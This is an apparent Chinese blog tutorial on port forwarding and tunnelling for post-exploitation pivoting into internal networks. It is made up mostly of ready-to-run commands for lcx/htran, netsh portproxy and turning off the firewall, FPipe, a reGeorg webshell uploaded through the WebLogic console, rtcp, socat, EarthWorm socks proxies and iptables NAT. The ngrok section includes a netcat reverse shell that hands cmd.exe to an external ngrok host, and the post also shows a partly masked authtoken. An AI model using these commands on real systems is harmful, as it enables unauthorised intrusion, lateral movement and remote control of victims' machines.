内网渗透----端口转发技术

0x01.htran/lcx

1. 使用htran/lcx进行正向转发

本机执行以下命令,将操作机的8888端口转发至目标机器的7001端口

lcx.exe -tran 8888 192.168.0.136 7001

访问操作机的8888端口
在这里插入图片描述

2. 使用htran/lcx进行反向转发

操作机执行

lcx.exe -listen 8888 5656

需上传lcx至靶机,并执行

lcx.exe -slave 192.168.0.126 8888 127.0.0.1 7001

攻击机访问本机5656端口
在这里插入图片描述

3. Linux版本的lcx
gcc portmap.c -o lcx

在这里插入图片描述

0x02.netsh

netsh firewall show state 查看防火墙状态
# netsh firewall set opmode disable 关闭防火墙
# netsh firewall set opmode enable 启用防火墙
netsh advfirewall firewall add rule name="in" dir=in action=allow protocol=TCP localport=8080
netsh advfirewall firewall add rule name="out" dir=out action=allow protocol=TCP localport=8080

操作机以管理员身份运行运行

netsh interface portproxy set v4tov4 listenaddress=127.0.0.1 listenport=3333 connectaddress=101.198.180.144 connectport=7001

访问3333端口
在这里插入图片描述

查看现有规则

netsh interface portproxy show all

删除转发规则

netsh interface portproxy delete v4tov4 listenport=3333

0x03.使用FPipe进行端口转发**

命令

FPipe.exe -l 5555 -r 7001 101.198.180.144 -v

在这里插入图片描述

0x04.使用reGeorg进行端口转发**

将tunnel.jsp压缩(必须是zip格式),并更改后缀名为war,通过weblogic后台上传至服务器

在这里插入图片描述
本地运行reGeorgSocksProxy.py
在这里插入图片描述

物理机运行反向代理

python reGeorgSocksProxy.py -p 2333 -u http://101.198.180.144:7001/tunnel/tunnel.jsp

在这里插入图片描述
本地使用Proxifier,配置代理服务器
在这里插入图片描述

添加代理规则,将python.exe排除在外
在这里插入图片描述

本地直接访问内网地址
在这里插入图片描述

0x05.使用rtcp进行转发**

Windows上监听端口

nc.exe -nvv -lp 4444

Linux上使用rtcp转发

python rtcp.py l:22 c:101.198.180.135:4444

Windows上已经接收到连接
在这里插入图片描述

在这里插入图片描述

0x06.本地转发

python rtcp.py l:4446 c:192.168.0.68:7001

访问Linux的4446端口
在这里插入图片描述

0x07.ssh+putty转发**

安装putty

apt-get install putty

打开putty,配置SSH
在这里插入图片描述

配置SSH隧道
在这里插入图片描述

连接SSH并登录,保持窗口不关闭
在这里插入图片描述

访问本机的8888端口:
在这里插入图片描述

0x08.ssh+SecureCRT转发**

会话选项中设置:
在这里插入图片描述

连接本地的4444端口:
在这里插入图片描述

0x09.socat转发**

安装socat

apt-get install socat

添加转发规则

socat TCP4-LISTEN:7777,reuseaddr,fork TCP4:192.168.0.92:7001

访问7777端口

在这里插入图片描述

0x10.EarthWorm

在这里插入图片描述

该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
在这里插入图片描述

正向socks5代理
ew_win32.exe -s  ssocksd -l 9999

在这里插入图片描述

反向socks5代理
相通机器:ew_win32.exe -s rcsocks -l 1080 -e 9999
目标主机:ew_win32.exe -s rssocks -d 1.1.1.1 -e 8888

0x11.ngrok

下载与注册
官网下载:https://ngrok.com/
口令至少10位
本地注册

./ngrok authtoken 5Ed5CTPFzS3**********_**********1E3ubPjGUfM

使用

./ngrok tcp 9999

目标端

nc.exe 0.tcp.ngrok.io 14*** -e C:\Windows\System32\cmd.exe

Linux端

nc -vv -l -p 9999

0x12.iptables

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 8888 -j DNAT --to-destination 192.168.111.251:3389
iptables -t nat -A POSTROUTING -d 192.168.111.251 -p tcp --dport 3389 -j SNAT --to 192.168.111.41

查看规则:

iptables -L -t nat

在这里插入图片描述

有些系统需要保存与重启,有些系统不需要:

service iptables save
service iptables restart

直接访问192.168.111.41的8888端口

在这里插入图片描述
删除规则:

iptables -D INPUT 3  //删除input的第3条规则  
iptables -t nat -D POSTROUTING 1  //删除nat表中postrouting的第一条规则  
iptables -F INPUT   //清空 filter表INPUT所有规则  
iptables -F    //清空所有规则  
iptables -t nat -F POSTROUTING   //清空nat表POSTROUTING所有规则 
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值